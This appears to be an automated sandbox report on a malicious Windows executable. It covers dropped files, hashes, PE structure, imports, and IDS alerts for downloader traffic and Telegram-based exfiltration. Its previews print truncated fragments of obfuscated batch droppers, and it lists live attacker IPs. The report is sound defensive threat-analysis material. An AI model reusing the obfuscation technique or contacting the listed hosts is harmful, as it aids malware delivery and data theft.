Process:	C:\Users\user\Desktop\yxU3AgeVTi.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1161216
Entropy (8bit):	7.246990828069092
Encrypted:	false
SSDEEP:	24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
MD5:	6047499517804F1EA76B508CA469DE99
SHA1:	BA5E8A683C8B8B54A14984D86715040D00777F11
SHA-256:	03B17E6FE6CE874C0CF78B2E560F5FB4106E07CE33799632B2E1BBF24E9FB371
SHA-512:	A617FD0131D75361D20423B0BC77B6EE65FE071FECF8A9FAB7EA42BE7F9716113468AF15369981F7F652A39F6AA7A77250E2E02783549DA2FCBC54D93821A76F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Joe Sandbox View:	Filename: ITT # KRPBV2663 .doc, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................\|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...\|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Users\user\Desktop\yxU3AgeVTi.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8556
Entropy (8bit):	4.623706637784657
Encrypted:	false
SSDEEP:	192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5:	60CD0BE570DECD49E4798554639A05AE
SHA1:	BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256:	CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512:	AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious:	true
Preview:	@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Users\user\Desktop\yxU3AgeVTi.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category:	dropped
Size (bytes):	46543
Entropy (8bit):	4.705001079878445
Encrypted:	false
SSDEEP:	768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5:	637A66953F03B084808934ED7DF7192F
SHA1:	D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256:	41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512:	2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious:	false
Preview:	@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

C:\Users\Public\Libraries\jphwmyiA.pif

Download File

Process:	C:\Users\user\Desktop\yxU3AgeVTi.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: ITT # KRPBV2663 .doc, Detection: malicious, Browse Filename: PI ITS15235.doc, Detection: malicious, Browse Filename: PO#5_Tower_049.bat, Detection: malicious, Browse Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse Filename: PO_B2W984.com, Detection: malicious, Browse Filename: image.exe, Detection: malicious, Browse Filename: PO_KB#67897.cmd, Detection: malicious, Browse Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.246990828069092
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	yxU3AgeVTi.exe
File size:	1'161'216 bytes
MD5:	6047499517804f1ea76b508ca469de99
SHA1:	ba5e8a683c8b8b54a14984d86715040d00777f11
SHA256:	03b17e6fe6ce874c0cf78b2e560f5fb4106e07ce33799632b2e1bbf24e9fb371
SHA512:	a617fd0131d75361d20423b0bc77b6ee65fe071fecf8a9fab7ea42be7f9716113468af15369981f7f652a39f6aa7a77250e2e02783549da2fcbc54d93821a76f
SSDEEP:	24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
TLSH:	70359E3795B387FDC15289798D5B9BD4A82EAC303A3CB552FDD2BE0C5B2414178381AB
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	4f858a8c8e8e8946

Static PE Info

General

Entrypoint:	0x46e80c
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	44c8864bd68c3bff94639c69671ea4b7

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0046D250h
call 00007F3244B7F331h
mov ecx, dword ptr [00470E9Ch]
mov eax, dword ptr [00470D8Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [0046CB00h]
call 00007F3244BD51C9h
mov eax, dword ptr [00470D8Ch]
mov eax, dword ptr [eax]
call 00007F3244BD523Dh
call 00007F3244B7D190h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x75000	0x266e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x82000	0xa1c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x7ce8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x79000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x75754	0x600	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c4c0	0x6c600	69c4173c38ad27686fb46f69fd79ec91	False	0.5070961288927336	data	6.531494017298441	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x6e000	0x848	0xa00	639613140a642faedd01bff468c3e3cf	False	0.523828125	data	5.552779847613545	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x6f000	0x1f40	0x2000	53b6dd6978c858db7e9faa57954b9c18	False	0.3963623046875	data	3.804120578626792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x71000	0x36ec	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x75000	0x266e	0x2800	f0f9a1156b641e5ea253cb6ddcaf08ba	False	0.3103515625	data	4.872671403071516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x78000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x79000	0x18	0x200	5b11e123dd9b7f6d94b27d2ad6e9bc83	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7a000	0x7ce8	0x7e00	3b0f62de599dc8a77438a9e2115a0b81	False	0.6107390873015873	data	6.679791141044884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x82000	0xa1c00	0xa1c00	6498f8147e5de62eba6c2cbe1cd20024	False	0.5015018233191654	data	7.093578426347301	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x83244	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x83378	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x834ac	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x835e0	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x83714	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x83848	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x8397c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x83ab0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x83c80	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x83e64	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x84034	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x84204	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x843d4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x845a4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x84774	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x84944	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x84b14	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x84ce4	0x81940	Device independent bitmap graphic, 971 x 182 x 24, image size 530712	English	United States	0.497995297238635
RT_BITMAP	0x106624	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.39864864864864863
RT_BITMAP	0x10674c	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x106874	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x10699c	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States	0.36637931034482757
RT_BITMAP	0x106a84	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.3614864864864865
RT_BITMAP	0x106bac	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x106cd4	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.49038461538461536
RT_BITMAP	0x106da4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3716216216216216
RT_BITMAP	0x106ecc	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.2905405405405405
RT_BITMAP	0x106ff4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.38175675675675674
RT_BITMAP	0x10711c	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x107244	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x10736c	0xe8	Device independent bitmap graphic, 12 x 16 x 4, image size 128	English	United States	0.3620689655172414
RT_BITMAP	0x107454	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.3581081081081081
RT_BITMAP	0x10757c	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x1076a4	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.47115384615384615
RT_BITMAP	0x107774	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.36824324324324326
RT_BITMAP	0x10789c	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.28716216216216217
RT_BITMAP	0x1079c4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x107aec	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x107c14	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x107d3c	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States	0.36637931034482757
RT_BITMAP	0x107e24	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.35135135135135137
RT_BITMAP	0x107f4c	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.36486486486486486
RT_BITMAP	0x108074	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.47115384615384615
RT_BITMAP	0x108144	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3581081081081081
RT_BITMAP	0x10826c	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.28716216216216217
RT_BITMAP	0x108394	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x10847c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 40314 x 40314 px/m			0.40560165975103735
RT_DIALOG	0x10aa24	0x52	data			0.7682926829268293
RT_DIALOG	0x10aa78	0x52	data			0.7560975609756098
RT_STRING	0x10aacc	0x35c	data			0.45348837209302323
RT_STRING	0x10ae28	0x2d8	data			0.4642857142857143
RT_STRING	0x10b100	0xc0	data			0.6770833333333334
RT_STRING	0x10b1c0	0xec	data			0.6483050847457628
RT_STRING	0x10b2ac	0x350	data			0.43514150943396224
RT_STRING	0x10b5fc	0x3cc	data			0.37962962962962965
RT_STRING	0x10b9c8	0x388	data			0.4092920353982301
RT_STRING	0x10bd50	0x418	data			0.36736641221374045
RT_STRING	0x10c168	0x140	data			0.515625
RT_STRING	0x10c2a8	0xcc	data			0.6127450980392157
RT_STRING	0x10c374	0x1ec	data			0.5345528455284553
RT_STRING	0x10c560	0x3b0	data			0.326271186440678
RT_STRING	0x10c910	0x354	data			0.4107981220657277
RT_STRING	0x10cc64	0x2a4	data			0.4363905325443787
RT_RCDATA	0x10cf08	0x10	data			1.5
RT_RCDATA	0x10cf18	0x338	data			0.6905339805825242
RT_RCDATA	0x10d250	0x1657c	GIF image data, version 89a, 360 x 360	English	United States	0.594748459285808
RT_RCDATA	0x1237cc	0x369	Delphi compiled form 'TForm1'			0.6071019473081328
RT_GROUP_CURSOR	0x123b38	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x123b4c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x123b60	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x123b74	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x123b88	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x123b9c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x123bb0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x123bc4	0x14	data			1.25

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	CreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
ole32.dll	CoCreateInstance, CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll	GetOpenFileNameA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-06T07:58:03.789102+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49732	132.226.247.73	80	TCP
2025-01-06T07:58:05.476678+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49732	132.226.247.73	80	TCP
2025-01-06T07:58:05.892354+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49734	188.114.97.3	443	TCP
2025-01-06T07:58:06.679742+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49735	132.226.247.73	80	TCP
2025-01-06T07:58:07.961019+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49737	132.226.247.73	80	TCP
2025-01-06T07:58:09.273655+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49739	132.226.247.73	80	TCP
2025-01-06T07:58:15.585113+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49748	188.114.97.3	443	TCP
2025-01-06T07:58:16.510336+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49751	149.154.167.220	443	TCP
2025-01-06T07:58:16.770857+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49752	132.226.247.73	80	TCP
2025-01-06T07:58:18.052213+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49752	132.226.247.73	80	TCP
2025-01-06T07:58:18.640832+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49758	188.114.97.3	443	TCP
